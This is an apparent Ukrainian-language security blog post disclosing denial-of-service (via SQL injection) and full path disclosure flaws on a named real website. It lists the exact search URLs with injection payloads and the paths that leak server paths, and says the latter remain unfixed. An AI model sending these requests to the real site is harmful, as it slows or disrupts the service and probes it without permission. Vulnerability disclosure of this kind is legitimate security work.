Websecurity - Веб безпека

26.02.2010

У липні, 28.07.2009, я знайшов Denial of Service та Full path disclosure уразливості на проекті http://www.helsinki.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.helsinki.org.ua.

Детальна інформація про уразливості з’явиться пізніше.

05.03.2011

DoS (через SQL Injection):

http://www.helsinki.org.ua/index.php?do=search&word=%25/*
http://www.helsinki.org.ua/index.php?do=search&word=%25%20or%201=1/*
http://www.helsinki.org.ua/index.php?do=search&word=%25%25%25

Full path disclosure:

http://www.helsinki.org.ua/index.php?do

http://www.helsinki.org.ua/inc/skin/main.php

Якщо DoS вже виправлені (хоча все ще є деякі приторможення сервера при другому запиті й аналогічних запитах), то FPD досі не виправлені.

This entry was posted on 15:28 05.03.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.